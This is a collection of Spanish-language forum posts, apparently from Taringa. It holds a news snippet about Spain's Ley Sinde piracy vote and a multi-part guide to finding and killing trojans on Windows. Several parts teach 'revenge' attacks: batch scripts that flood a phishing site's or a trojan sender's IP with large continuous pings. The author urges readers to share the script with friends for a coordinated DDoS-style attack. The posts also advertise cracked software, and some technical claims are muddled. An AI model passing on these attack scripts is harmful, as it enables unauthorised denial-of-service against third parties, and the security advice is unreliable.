alias3glw
Usuario (Ecuador)
Finalmente España no eliminará todas las webs de pirateria Hoy era el día marcado para que el congreso aprobara o no la Ley Sinde, ley que pretendía cerrar todos los sitios webs que contengan material que viole los derechos de autor, es decir, material pirata. Hace escasos minutos a las 21:00 (hora española) el congreso se reunió y decidió con 20 votos en contra, 18 votos a favor y una abstención que esta ley nunca viera la luz. Cabe mencionar que la reunión del congreso estaba pactada para las 14:00 horas de hoy, pero finalmente la votación se llevó a cabo 7 horas mas tarde y después de cuatro aplazamientos. De haber sido aprobada esta ley, hubiésemos tenido que decir adiós a todas las páginas de procedencia española que publiquen anime, manga, música japonesa... Sin contar las páginas que publican series, películas y demás. Esta ley fue promovida por Ángeles Gonzales Sinde, ministra de cultura española. El revuelo mediatico causado por la ley empezó en diciembre del año pasado cuando esta ministra propuso la ley abiertamente. Este no es el primer escándalo causado por la ministra de cultura, ya que hace unos meses decidió censurar la película Saw VI calificándola como pornográfica, por tanto las personas que querían verla debían asistir a cines de este tipo. Esta decisión sorprendió a todo el país, ya que Gonzales Sinde, además de ser ministra de cultura, es guionista y directora de cine. Desde hace meses diversos grupos salieron en contra de ley alegando que vulnera los derechos de libertad de expreción. Otras personalidades como Alejandro Sanz defendieron la ley porque consideraron que promovía los derechos de autor. http://www.anmtvla.com/2010/12/espana-no-eliminara-sitios-de-pirateria.html#ixzz18sJp3H5d
Primero entra y revisa el software que cree. instala varios programas crakeadeos, y muy utiles para tup de un solo tiro, Si te interesa haz click aqui EN estos tiempos todos nos hemos dado cuenta que en algunos posts, ya sea de novatos o news, se han posteado el famoso pishing robacuentas de taringa. por si fuera poco Crean un pishing de la version beta de T! Pero cuando denunciar el link robacuentas no es suficiente? alias3glw dijo:Aqui como denunciar los links robacuentas http://www.taringa.net/posts/taringa/12029859/Denunciando-links-robacuentas.html Supongamos que en Todo taringa encuentro un post que dirige a un robacuentas. Y si soy el unico, y puede Suponiendo que no tengo muchos amigos en T! Podemos atacarlos desde windows Pero mprimero vamos a ver a quien pertenece. Muchos users robacuentas usan miarroba hosting o eshost, o cualquiera que sea. Se puede saber el nombre del usuario en la mayoria. Para esto usaremos la herramienta whois, Que seria mejor en ingles asi Who Is? y que significa quien es?. Para usar esta herramienta usamos la pagina web oficial http://whois.domaintools.com/ YO BUSQUE LA PAGINA DE GOOGLE.COM Y SALIO ESTO Registrant: Dns Admin Google Inc. Please contact 1600 Amphitheatre Parkway Mountain View CA 94043 US +1.6502530000 Fax: +1.6506188571 Domain Name: google.com Registrar Name: Markmonitor.com Registrar Whois: whois.markmonitor.com Registrar Homepage: http://www.markmonitor.com Administrative Contact: DNS Admin Google Inc. 1600 Amphitheatre Parkway Mountain View CA 94043 US +1.6506234000 Fax: +1.6506188571 Technical Contact, Zone Contact: DNS Admin Google Inc. 2400 E. Bayshore Pkwy Mountain View CA 94043 US +1.6503300100 Fax: +1.6506181499 Created on..............: 1997-09-15. Expires on..............: 2020-09-13. Record last updated on..: 2011-07-20. Domain servers in listed order: ns4.google.com ns2.google.com ns3.google.com ns1.google.com Como sabran esto esta en ingles. Pero en Donde está en Negrillas suele aparecer el e-mail del administrador de la web. En este caso podria ser [email protected] El e-mail del robacuentas. Ahora solamente buscamos en taringa autor:juanhacker y lo boqueamos, Ahora ataquemos la web usando windows! No les puedo decir que tipo de ataque es este, puesto que se consideraria un tutorial. Pero el ataque es dirigido solo a links robacuentas, si tratas de hacerlo con otras webs, siplementeNo funciona En windows debemos habrir un block de notas y copiar y pegar lo siguiente @echo off color a title Atacando robacuentas By alias3glw echo. echo. ping -l 20000 -t AQUIVALAIP pause exit Donde dice AQUIVALAIP va la ip de la pagina web. Para conseguir la ip de la pagina debemos hacer lo siguiente. Vamos a inicio>todos los programas>accesorios>simbolo del sistema ahora escribimos ping lapaginaweb y enter El resultado seria algo asi Haciendo ping a www.l.google.com [74.125.67.99] con 32 bytes de datos: Respuesta desde 74.125.67.99: bytes=32 tiempo=250ms TTL=55 Respuesta desde 74.125.67.99: bytes=32 tiempo=258ms TTL=55 Respuesta desde 74.125.67.99: bytes=32 tiempo=250ms TTL=55 Respuesta desde 74.125.67.99: bytes=32 tiempo=252ms TTL=55 Estad¡sticas de ping para 74.125.67.99: Paquetes: enviados = 4, recibidos = 4, perdidos = 0 (0% perdidos), Tiempos aproximados de ida y vuelta en milisegundos: M¡nimo = 250ms, M ximo = 258ms, Media = 252ms En mi caso yo hice ping a www.google.com Si la pagina robacuentas no tiene www No lo pongas, Tampoco Pongas http:// Simplemente el nombre de la pagina.com o .net o lo que sea y ya Como podremos ver se repite cuatro veces esta linea Respuesta desde 74.125.67.99: bytes=32 tiempo=250ms TTL=55 ahora seleccionamos los numeros que estan despues de Respuesta desde y nos quedara asi 74.125.67.99 sin los : Ahora ya sabes la ip de la pagina web asi que en el bloque de notas cambias donde dice aqui va la ip por esto @echo off color a title Atacando robacuentas By alias3glw echo. echo. ping -l 20000 -t 74.125.67.99 pause exit Ahora esta con la ip de la pagina y simplemente lo guardamos ahora como ataque.bat en nuestro escritorio. le damos doble click y comienza el ataque. Finalmente Esto hara que suspendan la cuenta del usuario que crea los robacuentas. Por ejemplo en miarroba hosting, no se banea a los users. simplemente se elimina a la pagina y ya. Ahora vamos a vengarnos de los lammers o kakers, que nos envian trojan jorses a nustras pc para robarnos datos y etc. Primero es necesario que sepas como desactivar el trojan, saber cuando estas con un trojan y obtener la ip de direccion del trojan. Como desactivar troyanos indetectables parte 2 Como desactivar troyanos indetectables pate 1 Por motivos de seguridad informatica. No te puedo poner esto en un tutorial. Puesto a que es un programa con desarrollo constante. Es un programa cencillo, pero como dige la seguridad informatrica es primero Lo Unico en lo que les puedo ayudad ahora es. Usar el script que ya les deje @echo off color a title Atacando robacuentas By alias3glw echo. echo. ping -l 20000 -t AQUIVALAIP del kaker o lammer pause exit Ahora Simplemente lo guardan igualmente como ataque.bat, y lo comprimen con su winrar o winzip. Entoces ya desactivados los trojans de tu pc, Lo mandas a tus amigos y como ya esta prediseñado el ataque simplemente deven darle Doble click y entre almenus unos 3 o 4 lo atacan. CUANDO EL PROGRAMA OWNED! HAKER ESTE LISTO. Se los paso. Puesto que tiene muchos errores y pueden generar conflictos en su pc. El programa esta a su 75% y ya lo probe y es funcional. Pero como dije esta con algunos errores.
Esta es la segunda parte de mi post como vimos esa vez, el trojan que usa el nombre de iexplorer.exe para conectarse remotamente a otra pc, en este caso wilson pc (mi computadora), supimos que era un trojan, debido a que resolvimos los nombres de los nodos como podran ver la imagen. Lo que esta subrayado de amarillos Si desactivamos la seleccion de resolver nombres de nodos, nos aparecera la ip, del usar kaker. Ahora que podemos hacer? Como dije en mi post anteriror DESVENTAJA Pasa que cuando tu pc se reinicie el troyano velvera ala accion, pero si ya tienes identificado simplemente le das click en terminar la aplicación. Es es hasta que mas o menos tu antivirus lo detecte. Si tienes una pc con muchos virus este post te va a interesar. Asi que hasta que nuestro antivirus encuentre la manera de como eliminarlo, vamos a hacer lo siguiente. Debemos habrir un block de notas y escribiremos lo siguiente @echo off taskkill /F /IM iExplorer.exe pause Donde reemplazaremos el iExplorer.exe por el proceso que tiene nuestro trojan. Si no sabes cual es el proceso, es importante que leas la primera parte. En general la escritura seria asi @echo off taskkill /F /IM El nombre del proceso de tu trojan pause Al finalizar, lo guardas con el nombre que quieras, pero al final le pones .bat Ejemplo: Alias3glw.bat Y cada vez que reinicies tu pc simplemente le das doble click, presionas enter y yap, trojan desactivado. Ojo Ten cuidado con que vas a desactivar, en el networx, si la primera vez no te funciona dandole click derecho y terminar la aplicacion, con este bat puede que tu windows Hasta que reinices el sistema. Por eso digo que es importante que leas el primer post AHORA SI QUEREMOS VENGARNOS DEL USER QUE NOS MANDO EL TROJAN, HACEMOS LO SIGUIENTE Como vimos la primera vez si desactivamos la seleccion de resolver los nombres de los nodos, vamos a ver ti up y la ip del kaker. Tu ip va a ser donde dice la direccion Local, Y direccion remota La ip del kaker. Debremos habrir un cmd que en windows xp, van a inicio>ejecutar> ecriben cmd y dan enter, en vista y 7 Van a inicio, buscar, cmd.exe y enter. O sino la universal es inicio>todos los programas>accesorios>simbolo del sistema Y alli escriben cd.. luego otravez cd.. ahora ping -l 64000 -t La ip del kaker No que esta de azul, no deben escribir en el cmd. En resumen, eso hara que la conecion del kaker sea mas lenta, si tienes amigos, o varias coneccioes a internet, haces lo mismo en el cmd, y relentizaran al 100%. Es un ataque similar al nuke DDOS. h
Bueno taringa, Esta es la ultima parte de mis posts Como desactivar troyanos indetectables parte 1 Como desactivar troyanos indetectables parte 2(con mini venganza) Vengate del robacuentasn, lammer,o kaker Estas van a ser las descargas necesiarias ccleaner con un monton de programas muy utiles!! http://***/N2Q USB Show http://***/N2R Como vimos en la primera parte, aprendemos como saber si es que tengo un troyano, pero e habia olvidade de poner que muchas veces el troyano no se ejecuta sino hasta que el kaker o lammer active el cliente (que es a donde se conectan los troyanos) Un ejemplo de cliente Pues bien en los dos ultimos Post! no habia podido encontrar la manera de saber en donde se aloja el troyano. Pero ahora lo he encontrado con dos simples herramientas. CCleaner ShowUSB AHora usando el ccleaner y SABIENDO USAR GOOGLE.COM Encontramoes el trojan, EN el ejemplo mi trojan de llama hkcmdd.exe muchas veces se llaman como archivos del mismo Windows!!°! Pero Tenemos la opcion del poderoso google asi que asi se busca el error comun. Como veran ya instalado el programa ccleaner Vamos a tools o herramientas luego a startup o Inicio, y veremos lo que se ejecuta al iniciar windows!!!!! Si prestamos atencion a la imagen Loque esta subrayado de amarillo son cosas que normalmente Serian keys del Registro de windows: Eso es raro en un start up de windows, asi que si prestamos mas atencion veremos que nos da ala ubicacion del archivo, En mi caso C:UsersWilsonAppDataRoaminghkcmdd.exe Como dige si vemos en google es muy probable que nos salga esto Como ven es un proceso de windows. Pero siendo mas Inteligentes Una ves que encontremos en donde se ejecuta en nuestro windows comprovamos con lo que dice en nuestro ccleaner!. Si es erroneo sabremos que ahora debemos buscarlo manualmente. para ello voy como dice el ccleaner al dico duro c: la carpeta users, la subcarpeta wilson.... etc C:UsersWilsonAppDataRoaminghkcmdd.exe Pero no ejecutamos el .exe Poremos encontrar la carpeta vacia, con mas carpetas, con archivso, que no importan si no son el que buscamos el hkcmdd.exe enronces es muy probale que no lo encontremos Como veran en mi windows, esta predetermionado ver los archivos y carpetas ocultas: Pero si uds No simplemenet van a Heramientas, Opciones de la carpeta, ver, mostrar todos los archivos y carpetas ocultos y aceptar. Y aun asi no conseguimos ver el archivo asi que es por eso que utilice este programita tan sencillo y portable. Aunque dice que es para recuperar archivos de su usb tambien sirve para lo que queremos, asi que dal click en recuperar archivos y lo llevan a donde este el trojan en el caso mio manualmente a C:UsersWilsonAppDataRoaming Seleccionamos esa carpeta, No importa que muestre lo demas, pero le damos click en aceptar y empesamos, Una ves terminado regresamos a la carpeta Y!!!!! Y finalmenet lo borramos!!. Reiniciamos la PC Y veridicamos que ya no este!!!! Es normal que en el ccleaner se quede en start up, pero el archivo ya no existe Hazle clik al Play para saber que pasa despues de Eliminar el archivo, Lo hice con voz para que entiendan Mejor!!!!!!! link: http://www.goear.com/files/local.swf?file=d408638
Primero Vamos a descargar un programa llamado networx que es una interfaz grafica para el comando de cmd netstat. Lo puedes descargar buscando en google y en softonic o desde fileserve desde aqui. Por que si puedo ejecutar el comando cmd directamente en mi windows. Por que sencillamente, no todos los usuarios van a saber que significan todos esos numero y letras, y por que este programa tiene una herramienta que nos permitira ver la ip, (solo para users avanzados) PARA ESTE EJEMPLO yo use mi propia pc, y demostrando cuando uno sin querer instala un troyano este se conecta directamente al cliene asi Esto generalmente ocurre cuando el usuario coloca directamente su ip sin recurrir a una noip o protejer su ip bien. de todas maneras al usar este programa podremos ver su no ip o ip (si no entiendes de esto no importa es solo para users avanzados) Asi es como crean un instalador de troyano FINALMENTE CREADO EL TROYANO, te lo envian a ti via e-mail diciendo que es un parche, actualizacion etc. en mi caso lo deje como server. exe Digamos que instalas el troyano por accidente, darse cuenta es tan facil como cuando das doble click en el y sencillamente no aparece nada. Entonces es cuando abres el networx Seleccionas resolver nombres de nodos como esta en la imagen de arriba, y ahora veras que programa se conecta a donde, en este caso (la imagen de arriba) se auto conecta a mi propia pc, con in preceso llamado iexplorer.exe, que es un proceso default del windows xp pero lo quitaron desde la aparicion del windows vista y ahora solo se llama explorer.exe Si eres de los users avanzados qietar la opcion de los nodos te servira para ver su ip o noip, lo que te servira para hacere un ataque ddos o etc continuamos. Ahora le damos click derecho y seleccionamos en terminar la aplicacion en el networx. y tu pc desaparecera del servidor del kaker. Asi: Asi es como nos libramos del troyano. DESVENTAJA Pasa que cuando tu pc se reinicie el troyano velvera ala accion, pero si ya tienes identificado simplemente le das click en terminar la aplicación. Es es hasta que mas o menos tu antivirus lo detecte. Si tienes una pc con muchos virus este post te va a interesar. Nota: Estoy buscando la manera de eliminar finalmente el troyano, solo esperen. alias3glw dijo:Espero que esta informacion te haya sido de utilidad, Comentar no cuesta nada, y un simple gracias no te toma ni escribir 15 segundos